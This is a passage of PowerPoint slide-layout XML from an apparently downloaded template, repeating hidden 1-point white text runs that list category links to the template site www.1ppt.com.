              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout166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66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66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66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6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67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67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67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67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67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67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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout167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67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67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67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6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68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68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68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68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68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68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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout168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68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68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68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6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69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69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69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69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69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69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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
